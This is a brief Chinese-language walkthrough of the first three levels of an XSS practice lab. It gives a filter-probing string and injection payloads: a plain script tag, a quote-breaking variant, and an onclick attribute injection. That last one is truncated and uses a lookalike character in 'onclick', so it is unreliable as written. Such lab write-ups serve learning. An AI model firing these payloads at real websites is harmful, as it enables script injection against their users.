首先本次做题使用的XSS测试过滤payload为:
<img src="avc"><a href="www"><script 'on>
第一题:直接payload
<script>alert(1)</script>
第二题:查看源代码发现加了引号,直接绕过。
"><script>alert(1)</script><"
第三题:
源代码:
<input name=keyword
value='<script>alert(1)</script>'>
具有转义字符在value里面,我们首先构造一个单引号将前面的单引号闭合,后面来个注释符号,注释掉后面的单引号,中间来个onclick后面跟个alert。
构造payload:
'οnclick='alert